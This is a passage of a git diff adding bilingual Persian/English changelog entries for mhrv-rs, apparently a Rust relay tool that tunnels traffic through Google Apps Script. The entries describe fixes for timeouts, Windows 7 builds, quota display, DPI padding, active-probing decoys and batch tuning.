(که هنوز ۱۰ دقیقه cooldown داره). برای scenario `5 از 8 deployment کهنه`: بعد از یک batch، ۳ deployment dropped می‌شن و session جدید با احتمال خیلی بیشتر روی deployment سالم می‌افته. ممنون از @dazzling-no-more +--- +• Auto-blacklist deployments after sustained batch timeouts ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): previously, when a single deployment hung (most commonly due to a stale `TUNNEL_SERVER_URL` pointing at a dead host, or Apps Script's internal `UrlFetchApp` stalling), round-robin kept dispatching real traffic to it. Sessions piled into the bad deployment and timed out without recovery until the user restarted mhrv-rs. 
**Fix:** per-deployment strike counter with a 30-second sliding window — 3 timeouts in 30 s triggers a 120-second cooldown blacklist. Any successful batch clears the strike counter, so unrelated transient blips can't accumulate across hours. Short cooldown (2 min vs. the 10 min permanent-blacklist for quota errors) so a deployment that recovers rejoins the round-robin quickly. For the "5 of 8 deployments stale" scenario: after three timed-out batches each, the 5 stale deployments drop out and new sessions land on healthy deployments with much higher probability. Distinct from the quota blacklist (still 600s cooldown). Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.9.md b/docs/changelog/v1.7.9.md new file mode 100644 index 00000000..15a7c657 --- /dev/null +++ b/docs/changelog/v1.7.9.md @@ -0,0 +1,4 @@ + +• رفع باگ "binary i686 ویندوز روی Windows 7 ۳۲ بیتی load نمی‌شه" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)، [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): از Rust 1.78 (می ۲۰۲۴) std تابع `GetSystemTimePreciseAsFileTime` (Win8+) رو جایگزین `GetSystemTimeAsFileTime` (Win2k+) کرد، و این باعث شد binary ویندوز ۳۲ بیتی به یه export از kernel32 نیاز داشته باشه که تو Win7 وجود نداره. binary v1.7.7/v1.7.8 با خطای `the procedure entry point GetSystemTimePreciseAsFile could not be located in the dynamic link library kernel32.dll` روی Win7 SP1 بسته می‌شد. **Fix:** فقط target `i686-pc-windows-msvc` رو در workflow CI به Rust 1.77.2 (آخرین stable Win7-compatible) pin کردیم. سایر targets روی stable می‌مونن. این یعنی artifact `mhrv-rs-windows-i686.zip` در v1.7.9 روی Win7 SP1 ۳۲ بیتی load می‌شه. 
ممنون از @Im-P3dro برای گزارش +--- +• Fix "i686 Windows binary fails to load on Windows 7 32-bit" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318), [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): Rust 1.78 (May 2024) raised std's Windows MSRV from Win7 to Win10 by switching `std::time` to `GetSystemTimePreciseAsFileTime` (Win8+ in kernel32) instead of the older `GetSystemTimeAsFileTime`. The v1.7.7 and v1.7.8 i686 Windows binaries failed to load on Win7 SP1 with `the procedure entry point GetSystemTimePreciseAsFile could not be located in the dynamic link library kernel32.dll`, defeating the entire reason that target ships (legacy Win7 32-bit boxes per #272). **Fix:** pin only the `i686-pc-windows-msvc` CI matrix entry to Rust 1.77.2 (the last stable that targets Win7); every other target stays on `@stable`. The `mhrv-rs-windows-i686.zip` artifact in v1.7.9 once again loads on Win7 SP1. Thanks @Im-P3dro for the report. diff --git a/docs/changelog/v1.8.0.md b/docs/changelog/v1.8.0.md new file mode 100644 index 00000000..77a79bd7 --- /dev/null +++ b/docs/changelog/v1.8.0.md @@ -0,0 +1,12 @@ + +• Padding random برای پایلود Apps Script ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)، [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): هر request به Apps Script حالا یک فیلد `_pad` با طول uniform-random بین ۰-۱۰۲۴ بایت اضافه می‌کنه — به‌صورت base64 encoded. بدون این، طول request body در هر mode تقریباً ثابت می‌مونه + DPI ایران می‌تونه بر اساس distribution طول fingerprint بزنه. حالا packet sizes uniformly distributed هستن + length-clustering match نمی‌کنه. تأثیر bandwidth: متوسط ۵۱۲ بایت اضافه به batch ~۲KB = +۲۵٪، negligible در برابر floor latency Apps Script. backward-compatible: Code.gs قدیم هم کار می‌کنه (unknown JSON fields ignore می‌شن). 
+• Defense active probing: decoy 200 HTML در Code.gs / CodeFull.gs روی AUTH_KEY بد ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): قبلاً request بدون auth `{"e":"unauthorized"}` JSON برمی‌گردوند — fingerprint مشخص "این یه API endpoint هست". حالا یه HTML benign placeholder برمی‌گردونه که شبیه یه Apps Script web app forgotten-but-public هست. scanner active که با AUTH_KEY ساختگی POST می‌کنه categorize می‌کنه به‌عنوان "non-tunnel، nothing interesting". flag `DIAGNOSTIC_MODE` برای setup که response قدیمی JSON رو برمی‌گردونه — default `false` (production-strong) +• Defense active probing: decoy 404 nginx در tunnel-node روی auth بد: tunnel-node قبلاً `{"e":"unauthorized"}` JSON برمی‌گردوند. حالا response 404 با body HTML شبیه nginx default error می‌فرسته (active scanners "static web server هست، tunnel نیست" تشخیص می‌دن). env var `MHRV_DIAGNOSTIC=1` برای setup behavior قدیمی رو فعال می‌کنه +• رفع باگ "Usage today (estimated) در Full mode همیشه ۰" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): counter `today_calls` و `today_bytes` فقط روی apps_script-mode relay path در `domain_fronter::relay()` افزایش می‌یافت. Full mode از `tunnel_client::fire_batch` می‌گذره که کانتر رو زد. حالا fire_batch بعد از batch موفق `record_today(response_bytes)` رو صدا می‌زنه — bytes از sum طول `d` و `pkts` در BatchTunnelResponse تخمین زده می‌شه. Full mode users حالا "Usage today" واقعی می‌بینن +• رفع باگ "quota reset countdown با time UTC به‌جای PT نشون داده می‌شه" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's UrlFetchApp quota در 00:00 **Pacific Time** ریست می‌شه (PST/PDT با DST)، نه UTC. ما UTC midnight رو نشون می‌دادیم — ۷-۸ ساعت off. 
fix: helpers جدید `current_pt_day_key()` + `seconds_until_pacific_midnight()` با hand-rolled DST detection (بدون اضافه کردن chrono-tz / 3MB tzdb). UI label "UTC day" → "PT day" تغییر کرد. ۲ test جدید برای DST window boundaries (مارس ۲۰۲۴/۲۰۲۶/۲۰۲۷، نوامبر ۲۰۲۴/۲۰۲۶) + Sakamoto's day-of-week +--- +• Random payload padding for Apps Script requests ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313), [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): every outbound request to Apps Script now carries a `_pad` field of uniform-random length 0–1024 bytes (base64 encoded). Before this, request body sizes within each mode were tightly clustered, giving ISP DPI a clean length-distribution fingerprint to match against. Now packet sizes are spread uniformly across the range so length-clustering DPI heuristics can't match. Bandwidth cost: ~512 bytes added to a typical 2 KB tunnel batch = +25%, negligible against Apps Script's per-call latency floor. Backward-compatible: old Code.gs deployments ignore the unknown field. Applied at all three payload-build sites: single relay, single tunnel op, batch tunnel. +• Active-probing defense: decoy 200 HTML on bad AUTH_KEY in `Code.gs` and `CodeFull.gs` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a request with a missing/wrong AUTH_KEY got `{"e":"unauthorized"}` as a JSON body — a clear "this is some kind of API endpoint" signal that active scanners can fingerprint. Now bad-auth requests get a benign HTML placeholder page that looks like a forgotten-but-public Apps Script web app, indistinguishable from the millions of stale Apps Script projects on Google's infrastructure. New `DIAGNOSTIC_MODE` const (default `false`) restores the old JSON error response for setup/debugging — flip to `true` while configuring a misconfigured client, then back to `false` before sharing the deployment widely. 
+• Active-probing defense: decoy 404 nginx-style HTML on bad auth in `tunnel-node` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a bad-auth request got `{"e":"unauthorized"}`. Now it gets an HTTP 404 with an `nginx`-style error page body, looking like a vanilla static web server. Active scanners that POST malformed payloads to `/tunnel` to discover proxy endpoints categorize this host as "boring" and move on. New `MHRV_DIAGNOSTIC=1` env var restores the verbose JSON error during setup; default is the production decoy. +• Fix "Usage today (estimated) is always 0 in Full mode" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): the daily-usage counters (`today_calls` / `today_bytes`) were incremented only on the `apps_script`-mode relay path inside `domain_fronter::relay()`. Full-mode traffic goes through `tunnel_client::fire_batch` which never wired the counter. Now `fire_batch` calls `record_today(response_bytes)` after each successful batch — bytes are estimated from the sum of per-session `d` (TCP payload) and `pkts` (UDP datagrams) lengths in the `BatchTunnelResponse`, which is a stable proxy for "how much did this batch move." Full mode users now see real usage numbers instead of stuck-at-zero. +• Fix "quota reset countdown shown in UTC instead of Pacific Time" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's `UrlFetchApp` quota actually resets at midnight Pacific Time (PST/PDT — observes DST), not midnight UTC. We were displaying the countdown to UTC midnight, which is 7–8 hours off depending on DST. 
Fix: new `current_pt_day_key()` + `seconds_until_pacific_midnight()` helpers using a hand-rolled US DST detector (2nd Sunday of March → 1st Sunday of November = PDT, otherwise PST) so we don't pull `chrono-tz` and a ~3 MB IANA tzdb just for one helper. UI label updated from "UTC day" to "PT day". Two new tests pin down the DST window boundaries (March 2024 / 2026 / 2027, November 2024 / 2026) and Sakamoto's day-of-week formula. diff --git a/docs/changelog/v1.8.1.md b/docs/changelog/v1.8.1.md new file mode 100644 index 00000000..56bcadc2 --- /dev/null +++ b/docs/changelog/v1.8.1.md @@ -0,0 +1,8 @@ + +• تشخیص خطای decoy v1.8.0 در سمت کلاینت — پیغام واضح به‌جای cryptic ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)، [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): قبلاً وقتی deployment auth fail می‌گرفت + decoy HTML برمی‌گردوند، client پیغام `WARN batch failed: bad response: no json in batch response: ...` می‌داد. کاربر باید خودش متن decoy رو می‌شناخت تا تشخیص بده. حالا client decoy رو با string-match تشخیص می‌ده + پیغام explicit می‌ده: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION, or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." — کاربر مستقیم می‌فهمه چی بکنه + ساعت‌ها debug ذخیره می‌شه +• اضافه شدن `script_id` به همه log‌های batch-failure ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): قبلاً log `WARN batch failed: ...` نام deployment که fail کرد رو نشون نمی‌داد. در multi-deployment scenarios (5-10 deployment که برخی AUTH_KEY اشتباه داره)، کاربر نمی‌تونست بدون سختی deployment معیوب رو identify کنه. حالا همه پیغام‌های failure (timeout، bad response، decoy، missing-response-in-batch) شامل short prefix script_id هستند: `batch failed (script AKfycbz4): ...`. 
این + تشخیص decoy بالا، اولین diagnostic قابل‌اعتماد برای الگوی multi-deployment با یک AUTH_KEY خراب هست
+• Flag config جدید `disable_padding: true` ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): پیش‌فرض `false` (padding فعال = DPI defense). برای کاربران روی ISP‌های heavily-throttled که هزینه padding ~۲۵٪ bandwidth با throttle compounds + batchهای borderline-working رو into timeout می‌اندازه، گذاشتن `"disable_padding": true` در config.json در ازای از دست دادن محافظت length-distribution DPI، headroom برمی‌گردونه. توصیه نیست speculatively فعال بشه — فقط بعد از measurement throughput improvement.
+---
+• Client-side decoy detection — clear hint instead of cryptic error ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404), [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): previously when a deployment had a stale/wrong AUTH_KEY, mhrv-rs returned the v1.8.0 bad-auth decoy HTML, and the client logged `WARN batch failed: bad response: no json in batch response: ...` — leaving the user to recognize the decoy body string and infer the cause. Now the client string-matches the decoy and emits an explicit error: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION (Apps Script doesn't auto-pick-up AUTH_KEY edits without an explicit redeploy), or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." Saves users hours of staring at "no json in batch response" trying to figure out what's wrong.
+• Add `script_id` to every batch-failure log line ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): previously `WARN batch failed: ...` didn't identify which deployment failed.
In multi-deployment setups (5-10 deployments where one or two have a stale AUTH_KEY), users couldn't identify the culprit without the per-deployment curl probe loop. Every failure log line now includes the short script_id prefix: `batch failed (script AKfycbz4): ...`, applied to all four failure paths (timeout, bad response, decoy, missing-response-in-batch). Together with the decoy detection above, the first reliable diagnostic for the multi-deployment-with-one-bad-AUTH_KEY user pattern. +• New `disable_padding: true` config flag ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): default `false` (padding active, full DPI defense). For users on heavily-throttled ISPs where the v1.8.0 random-padding cost (+~25% bandwidth per batch) compounds with the throttle to push borderline-working batches into timeouts, setting `"disable_padding": true` in `config.json` recovers headroom in exchange for losing length-distribution DPI defense. Don't flip on speculatively — for users where Apps Script outbound is uncongested, padding is free defense. Only enable if you've measured throughput improvement after the flip on your specific ISP path. diff --git a/docs/changelog/v1.8.2.md b/docs/changelog/v1.8.2.md new file mode 100644 index 00000000..9350c9c3 --- /dev/null +++ b/docs/changelog/v1.8.2.md @@ -0,0 +1,6 @@ + +• اصلاح log level در UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): قبلاً `mhrv-rs-ui` (و Android) فیلتر tracing رو فقط از `RUST_LOG` env var یا default `info,hyper=warn` می‌خوند — مقدار `log_level` در `config.json` در عمل ignore می‌شد. فرم UI combobox `log_level` داشت ولی هیچ‌جا به subscriber اعمال نمی‌شد. حالا precedence اینه: `RUST_LOG` (اگر set باشد) > `config.log_level` > `info,hyper=warn`. علاوه بر این Save در UI الان log level رو live اعمال می‌کنه (بدون نیاز به restart) از طریق reload handle. CLI `mhrv-rs` از قبل درست کار می‌کرد — این فقط fix UI bin بود. 
+• پیغام تشخیص decoy ملایم‌تر — به‌جای assert AUTH_KEY mismatch، چهار علت ممکن enumerate می‌کنه ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i گزارش داد همان `script_id` گاهی decoy و گاهی موفقیت برمی‌گرده در یک دقیقه — یعنی NOT AUTH_KEY mismatch (اگر بود ۱۰۰٪ fail می‌گرفت). تحقیق نشون داد body string `"The script completed but did not return anything"` اختصاصی به decoy v1.8.0 ما نیست — Apps Script همان body رو در ۴ سناریو برمی‌گردونه: (۱) AUTH_KEY mismatch (decoy ما، intentional)، (۲) Apps Script execution timeout یا quota tear، (۳) Google-side internal hiccup، (۴) ISP-side response truncation (#313 pattern). Error message v1.8.1 false positive داشت در سناریو ۲-۴. حالا پیغام: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch, (2) Apps Script execution timeout/quota tear, (3) Apps Script internal hiccup, (4) ISP-side response truncation. Set DIAGNOSTIC_MODE=true to disambiguate (1) — only AUTH_KEY mismatch returns this body in diagnostic mode." کاربر action درست رو کشف می‌کنه. +--- +• Fix log level on the UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): previously `mhrv-rs-ui` (and Android, which uses the same JNI path) installed its tracing filter from `RUST_LOG` only — falling back to `info,hyper=warn` when unset. The `log_level` field in `config.json` was effectively ignored, even though the UI form has a combobox that writes to it. The CLI binary (`mhrv-rs`) read `config.log_level` correctly via `init_logging()`; only the UI binary was broken. New precedence: `RUST_LOG` (explicit override) > `config.log_level` (what the user picked in the form) > `info,hyper=warn` (default). The Save button now also reinstalls the filter live via a `tracing_subscriber::reload::Handle`, so users don't need to restart for a level change to take effect. RUST_LOG still wins if set at boot — explicit override beats config in both directions. 
+• Soften the v1.8.1 decoy detection error message — enumerate four candidate causes instead of asserting AUTH_KEY mismatch ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i reported the same `script_id` mixing decoy ERROR with successful batches inside a one-minute window — which rules out AUTH_KEY mismatch as the cause (a real mismatch fails 100% of batches against that deployment, never succeeds intermittently). Investigation showed the body string `"The script completed but did not return anything"` is **not** unique to our v1.8.0 bad-auth path — Apps Script itself returns the same body in three other unrelated cases: (2) Apps Script execution timeout or per-100s quota tear, (3) Google-side internal runtime hiccup, (4) ISP-side response truncation mid-flight (the #313 pattern). The v1.8.1 error message was a false positive in scenarios 2-4. The v1.8.2 message now reads: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch (run a direct curl probe against the deployment to verify), (2) Apps Script execution timeout or per-100s quota tear (try lowering parallel_concurrency), (3) Apps Script internal hiccup (transient, retry next batch), or (4) ISP-side response truncation (#313 pattern, try a different google_ip). To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new version — only AUTH_KEY mismatch returns this body in diagnostic mode." Users now have an actionable narrowing procedure instead of a confidently-wrong assertion. 
diff --git a/docs/changelog/v1.8.3.md b/docs/changelog/v1.8.3.md new file mode 100644 index 00000000..f408ce94 --- /dev/null +++ b/docs/changelog/v1.8.3.md @@ -0,0 +1,12 @@ + +• cache spreadsheet اختیاری در Code.gs برای کاهش مصرف quota ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400)، PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) از @euvel): GET requests عمومی که Cache-Control header دارن می‌تونن از Google Sheet به‌جای Apps Script's UrlFetchApp serve بشن. هزینه‌ی هر cache hit ~۵-۲۰ms (Sheet read) به‌جای ۲۵۰-۵۰۰ms (UrlFetchApp roundtrip). features کامل: TTL-aware (max-age, no-cache, no-store, private respect)، header rewriting (Date/Age/X-Cache)، circular buffer برای O(1) writes، Vary-aware با Accept-Encoding/Accept-Language. opt-in via یک constant `CACHE_SPREADSHEET_ID` در Code.gs — default غیرفعال، بدون overhead برای کاربران که نمی‌خوان. setup: ساخت یک Google Sheet جدید + قرار دادن ID آن در `CACHE_SPREADSHEET_ID` + redeploy as new version +• bypass DoH endpoints from Apps Script tunnel ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377)، PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) از @dazzling-no-more): قبلاً در Full mode هر DNS-over-HTTPS lookup browser از طریق Apps Script tunnel می‌رفت — `chrome.cloudflare-dns.com:443`، `dns.google:443` و سایر هزینه ~۲ ثانیه UrlFetchApp roundtrip به ازای هر name داشتن. ولی DoH از قبل encrypted هست + tunnel privacy اضافه‌ای نمی‌ده — فقط fact-of-DoH رو از local network مخفی می‌کنه که ناچیزه. حالا `bypass_doh_hosts` config (default true) routes DoH lookups مستقیم via TCP/443. لیست کامل bypass شامل: Cloudflare (incl. chrome./mozilla./1dot1dot1dot1.)، Google، Quad9، AdGuard، NextDNS، OpenDNS، CleanBrowsing، dns.sb، dns0.eu، AliDNS، doh.pub، Mullvad. 
کاربران می‌توانند با `tunnel_doh: true` در config opt-out کنن یا با `bypass_doh_hosts: ["custom1.com", "custom2.com"]` لیست رو extend کنن +• H1 container keepalive (~۲۴۰s) برای جلوگیری از Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): Apps Script container‌ها بعد از ~۵ دقیقه idle cold می‌شن + ۱-۳ ثانیه به wake-up زمان می‌برن. این به‌خصوص در YouTube playback بعد از pause طولانی stall به‌وضوح دیده می‌شد. با ping HEAD به example.com هر ۲۴۰ ثانیه از طریق relay، container warm نگه داشته می‌شه. cache + inflight coalescer bypass شده تا ping واقعاً به Apps Script برسه. در google_only mode غیرفعال +• 431 Request Header Fields Too Large به‌جای drop سکوتی (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): قبلاً اگر header block > ۱ MB می‌شد، socket drop می‌شد + browser silently retry می‌کرد + loop ابدی. حالا cap به ۶۴ KB کاهش یافته (match upstream Python) + explicit `HTTP/1.1 431 Request Header Fields Too Large` response برمی‌گرده + close می‌شه. browser ارور رو ببینه + loop رو نمی‌سازه +• پیام error config port-collision واضح‌تر شد (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): قبلاً پیام cryptic بود. حالا: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` — کاربر مستقیم می‌فهمه چی fix بکنه +--- +• Optional spreadsheet-backed response cache in `Code.gs` to reduce UrlFetchApp quota consumption ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400), PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) by @euvel): public GET requests with `Cache-Control` headers can now be served from a Google Sheet instead of round-tripping through `UrlFetchApp`. Cache hit costs ~5-20ms (Sheet read) vs ~250-500ms (UrlFetchApp). 
Features: TTL-aware caching (respects `max-age`, `no-cache`, `no-store`, `private`), 35 KB body-size gate (under the Sheets cell limit), header rewriting (Date/Age/Cache-Control/X-Cache/X-Cached-At), circular buffer for O(1) writes, Vary-aware compound keys (Accept-Encoding + Accept-Language). Opt-in via a single `CACHE_SPREADSHEET_ID` constant — default off, zero overhead for users who don't want it. Setup: create a new Google Sheet, paste its ID into `CACHE_SPREADSHEET_ID`, redeploy as new version. Run `getCacheStats()` from the Apps Script editor to see hit/miss/eviction counts. +• Bypass Apps Script tunnel for DoH endpoints on TCP/443 ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377), PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) by @dazzling-no-more): previously every browser DNS-over-HTTPS lookup in Full mode rode through the Apps Script tunnel — `chrome.cloudflare-dns.com:443`, `dns.google:443`, etc. each paid the ~2-second UrlFetchApp round-trip per name. But DoH is already encrypted at the transport layer; tunneling it adds no real privacy (only hiding fact-of-DoH from the local network, which is marginal). Now `bypass_doh_hosts` config (default `true`) routes known DoH hosts around the tunnel via plain TCP. Built-in list: Cloudflare (incl. `chrome.`/`mozilla.`/`1dot1dot1dot1.` browser-pinned variants), Google, Quad9, AdGuard, NextDNS, OpenDNS, CleanBrowsing, dns.sb, dns0.eu, AliDNS, doh.pub, Mullvad. Users can opt out with `tunnel_doh: true` or extend the list with `bypass_doh_hosts: ["custom1.com", "custom2.com"]`. Gated to TCP/443 only — private DoH endpoints on `:8443` should use `passthrough_hosts` instead. ProxyServer warns at startup if `tunnel_doh: true` is paired with non-empty `bypass_doh_hosts` (the otherwise-silent inert combo). 
6 unit tests for `matches_doh_host` covering exact match, case insensitivity, trailing dots, suffix tenant subdomains, user extras extending the default list, and the asymmetric-matching footgun guard. +• H1 container keepalive (~240s) to prevent Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): Apps Script V8 containers go cold after ~5 minutes idle and cost 1-3s to wake. Most visible as YouTube player stalls after a quiet pause. Now sends a `HEAD http://example.com/` ping every 240s through the relay to keep the container warm. Bypasses the response cache and inflight coalescer (otherwise the second iteration would just hit the cache and never reach Apps Script). Skipped in `google_only` mode. The `JoinHandle` is captured so shutdown's `select!` arm can abort it cleanly — without that, hitting Stop in the UI would leave the keepalive holding an `Arc` on stale config (same class of bug as #99 hit for accept loops). +• 431 Request Header Fields Too Large instead of silent drop (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): previously header blocks larger than 1 MB were silently dropped at the socket level, causing browsers to retry on connection-reset and loop indefinitely on the same oversized request. Now the cap is tightened to 64 KB (matching upstream Python's `MAX_HEADER_BYTES`) and oversized requests get an explicit `HTTP/1.1 431 Request Header Fields Too Large` reply followed by close. Both the plaintext HTTP frontend and the MITM HTTPS relay path now do this. Browsers see the error and don't loop. +• Clearer port-collision error message (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): the same-port validation already existed; only the message was vague. Now reads: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` matching upstream Python's clarity. 
diff --git a/docs/changelog/v1.8.4.md b/docs/changelog/v1.8.4.md new file mode 100644 index 00000000..11e479a1 --- /dev/null +++ b/docs/changelog/v1.8.4.md @@ -0,0 +1,8 @@ + +• **adaptive batch coalescing** برای کاهش تعداد Apps Script roundtrip‌ها (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) از @yyoyoian-pixel): قبلاً هر op فقط ۸ms برای op‌های هم‌زمان دیگر صبر می‌کرد + اکثراً batchها فقط ۱ op داشتن. حالا scheme adaptive: اولین op یک timer ۴۰ms استارت می‌زنه، op‌های جدید reset می‌کنن، اگر ۴۰ms idle شد batch fire می‌شه. cap نهایی ۱۰۰۰ms. نتیجه field test روی شبکه ایران: ops/batch از ۱.۰ به ۲-۳، P75 RTT از ۶.۲s به ۳.۰s، کاهش ~۵۰٪ Apps Script call. configurable از طریق `coalesce_step_ms` / `coalesce_max_ms` در config + در Android UI Advanced section با slider +• **tunnel-node long-poll از ۵s به ۱۵s** برای پایداری Telegram + Google Push (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) از @yyoyoian-pixel): قبلاً connection‌های persistent (Telegram XMPP پورت ۵۲۲۲، Google Push پورت ۵۲۲۸) هر ۵ ثانیه empty-response برمی‌گرفتن + apps این رو instability تفسیر می‌کردن + session reconnect می‌زدن. هر reconnect معادل یک TLS handshake کامل (~۴s از طریق Apps Script) یعنی buffering قابل مشاهده در تماس Telegram یا playback. حالا long-poll تا ۱۵ ثانیه باز می‌مونه + persistent connection پایدار می‌مونه +• **adaptive straggler settle** در tunnel-node (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): قبلاً fixed ۳۰ms wait بعد از اولین session که data داشت. حالا adaptive ۴۰ms-step تا ۵۰۰ms-max که زود break می‌شه اگر همه session‌ها ready باشن. 
در شبکه‌های latency بالا (~۱.۵s Apps Script overhead) packing بیشتر session response در یک batch، quota مصرف کم‌تری ایجاد می‌کنه +--- +• **Adaptive batch coalescing** to reduce Apps Script round-trip count (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) by @yyoyoian-pixel): the previous fixed 8ms coalesce window barely caught concurrent ops — most batches were a single op. The new adaptive scheme starts a 40ms timer on first arrival, resets on each new op, fires the batch when the window stays empty, with a hard 1000ms cap. Field testing on a network in Iran showed ops/batch went from ~1.0 to 2-3, P75 RTT 6.2s → 3.0s, fast (<3s) batches 61% → 74-85%, total Apps Script calls roughly halved. Both values configurable via `coalesce_step_ms` / `coalesce_max_ms` in `config.json` and via sliders in the Android UI's Advanced section. Desktop UI sliders are queued for the v1.8.x desktop UI batch alongside the system-proxy toggle (#432). +• **tunnel-node long-poll raised from 5s to 15s** for persistent-connection stability (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) by @yyoyoian-pixel): at 5s long-poll, persistent connections like Telegram XMPP (`:5222`) and Google Push (`mtalk.google.com:5228`) interpreted the frequent empty-poll returns as connection instability and rotated sessions. Each reconnect cost a full TLS handshake (~4s through Apps Script), causing visible interruptions during Telegram video/voice calls and media playback. The 15s long-poll holds the response open until server data actually arrives, keeping persistent sessions alive without unnecessary re-handshakes. +• **Adaptive straggler settle in tunnel-node** (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): the previous fixed 30ms straggler settle was too short to catch neighboring sessions with data. Replaced with adaptive 40ms-step / 500ms-max settle that breaks early when all sessions in a batch have data. 
On high-latency relays (~1.5s Apps Script overhead per call), packing more session responses into one batch saves quota; the early-break prevents wasted time when all data is already ready. diff --git a/docs/changelog/v1.8.5.md b/docs/changelog/v1.8.5.md new file mode 100644 index 00000000..eead68c8 --- /dev/null +++ b/docs/changelog/v1.8.5.md @@ -0,0 +1,4 @@ + +• fix tunnel-node: cap هر TCP drain روی ۱۶ MiB تا batch response از سقف Apps Script (~۵۰ MiB) عبور نکنه ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) از @bankbunk): روی VPS های پر-bandwidth (۱ Gbps) reader task می‌تونه ده‌ها مگابایت رو در buffer per-session جمع کنه قبل از اینکه poll بعدی بیاد. قبلاً `drain_now` همه‌ی buffer رو در یک batch response می‌گرفت، base64 encoding (~۱.۳۳×) + JSON envelope اضافه می‌کرد، نتیجه از سقف ۵۰ MiB Apps Script رد می‌شد. Apps Script body رو mid-base64 کوتاه می‌کرد + client side `serde_json` parse error با `EOF while parsing a string at line 1 column 52428685` می‌گرفت. برای استریم MP4 یا هر بایت‌سنگین upstream این bug stream رو مرتب کرش می‌داد. حالا `drain_now` حداکثر ۱۶ MiB در هر poll برمی‌گردونه + tail رو در buffer برای poll بعدی نگه می‌داره. eof تا finalize شدن buffer reported نمی‌شه که session بی‌موقع tear نشه. workaround قبلی @bankbunk (محدودکردن interface VPS با `wondershaper` به ۴۰ Mbps) دیگر لازم نیست — fix server-side پیاده شد و کاربران throughput عادی VPS رو خواهند داشت
+---
